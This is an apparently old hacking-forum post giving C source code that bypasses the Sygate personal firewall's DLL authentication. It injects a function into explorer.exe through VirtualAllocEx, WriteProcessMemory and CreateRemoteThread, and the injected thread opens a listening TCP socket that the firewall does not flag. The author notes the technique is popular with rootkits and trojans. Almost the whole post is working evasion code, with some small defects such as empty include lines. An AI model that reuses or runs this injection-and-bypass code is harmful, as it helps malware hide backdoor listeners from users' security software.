bypass dll authentication in sygate and such

  akcom

sygate uses a very 'spiff' method that limits injecting a dll into a process, a popular method for rootkits and trojans alike. this is just some example code to bypass sygate dll authentication, its very simple, but its just to get the concept across. It functions by allocating a function in a remote application (in this example, explorer.exe) and then executes the thread. the thread then sets up a listening socket, all of which should get bypass sygate's dll authenication.

I'm not a big fan of commenting, so if you have any questions, just provide me with the line and i will explain it

#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#include
#include

typedef int (WSAAPI *LPWSAStartup)( IN WORD wVersionRequested, OUT LPWSADATA lpWSAData );
typedef SOCKET (WSAAPI *LPsocket)( IN int af, IN int type, IN int protocol );
typedef int (WSAAPI *LPbind)( IN SOCKET s, IN const struct sockaddr FAR * name, IN int namelen );
typedef int (WSAAPI *LPlisten)( IN SOCKET s, IN int backlog );
typedef SOCKET (WSAAPI *LPaccept)( IN SOCKET s, OUT struct sockaddr FAR * addr, IN OUT int FAR * addrlen );
typedef int (WSAAPI *LPclosesocket)( IN SOCKET s );
typedef int (WSAAPI *LPsend)( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags );
typedef HMODULE (WINAPI *LPLoadLibrary)( IN LPCSTR lpLibFileName );
typedef FARPROC (WINAPI *LPGetProcAddress)( IN HMODULE hModule, IN LPCSTR lpProcName );


typedef struct _INJINFO
{
char c_Lib[16];
char c_WSAStartup[12];
char c_Socket[8];
char c_Bind[8];
char c_Listen[8];
char c_Accept[8];
char c_CloseSocket[16];
char c_send[8];
char c_data[45];
LPLoadLibrary LoadLib;
LPGetProcAddress GetProcAddr;
} INJINFO, *PINJINFO;

static DWORD WINAPI ThreadProc( LPVOID lpParams )
{
PINJINFO info = (PINJINFO)lpParams;

HMODULE hLib = info->LoadLib( info->c_Lib );

LPWSAStartup wsastartup = (LPWSAStartup)info->GetProcAddr( hLib, info->c_WSAStartup );
LPsocket wsasocket = (LPsocket)info->GetProcAddr( hLib, info->c_Socket );
LPbind wsabind = (LPbind)info->GetProcAddr( hLib, info->c_Bind );
LPlisten wsalisten = (LPlisten)info->GetProcAddr( hLib, info->c_Listen );
LPaccept wsaaccept = (LPaccept)info->GetProcAddr( hLib, info->c_Accept );
LPclosesocket wsaclosesocket = (LPclosesocket)info->GetProcAddr( hLib, info->c_CloseSocket );
LPsend wsasend = (LPsend)info->GetProcAddr( hLib, info->c_send );

SOCKADDR_IN sAddr;
sAddr.sin_addr.s_addr = INADDR_ANY;
sAddr.sin_port = 0xDEAD;
sAddr.sin_family = AF_INET;

WSADATA wsa;
wsastartup( 0x0202, &wsa );

SOCKET ServerSocket = wsasocket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
wsabind( ServerSocket, (LPSOCKADDR)&sAddr, sizeof(sAddr) );
wsalisten( ServerSocket, 5 );

SOCKET cli;
while (true)
{
cli = wsaaccept( ServerSocket, NULL, NULL );
if ( cli == SOCKET_ERROR )
break;
wsasend( cli, info->c_data, 45, 0 );
}

wsaclosesocket( ServerSocket );
return 0;
}

static void __declspec( naked ) end_proc()
{

}

INJINFO info =
{
"ws2_32.dll",
"WSAStartup",
"socket",
"bind",
"listen",
"accept",
"closesocket",
"send",
"slutted",
NULL,
NULL
};

int main(int argc, char* argv[])
{
HMODULE hLib = LoadLibrary( "kernel32.dll" );

info.LoadLib = (LPLoadLibrary)GetProcAddress( hLib, "LoadLibraryA" );
info.GetProcAddr = (LPGetProcAddress)GetProcAddress( hLib, "GetProcAddress" );
DWORD dwPID;

GetWindowThreadProcessId( FindWindow( "Shell_TrayWnd", NULL ), &dwPID );

printf( "explorer pid: 0x%x/n", dwPID );

HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
if ( hProcess == NULL )
{
printf( "error opening process/n" );
return 0;
}

DWORD ProcSize = (DWORD)end_proc - (DWORD)ThreadProc;
printf( "proc size: %u/n", ProcSize );
LPVOID lpProc = VirtualAllocEx( hProcess, NULL, ProcSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
LPVOID lpParams = VirtualAllocEx( hProcess, NULL, 1024, MEM_COMMIT, PAGE_READWRITE );

if ( !lpProc || !lpParams )
{
printf( "error allocating mem/n" );
return 0;
}
printf( "memory allocated at 0x%X and 0x%X/n", lpProc, lpParams );

DWORD dwWritten;
WriteProcessMemory( hProcess, lpProc, ThreadProc, ProcSize, &dwWritten );
WriteProcessMemory( hProcess, lpParams, &info, sizeof( info ), &dwWritten );

printf( "memory written/n" );
DWORD ThreadID;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpProc, lpParams, 0, &ThreadID );

if ( hThread == NULL )
{
printf( "error creating thread/n" );
}
else
{
WaitForSingleObject( hThread, INFINITE );
}

VirtualFreeEx( hProcess, lpProc, ProcSize, MEM_DECOMMIT );
VirtualFreeEx( hProcess, lpParams, 1024, MEM_DECOMMIT );

printf( "done/n" );
return 0;
}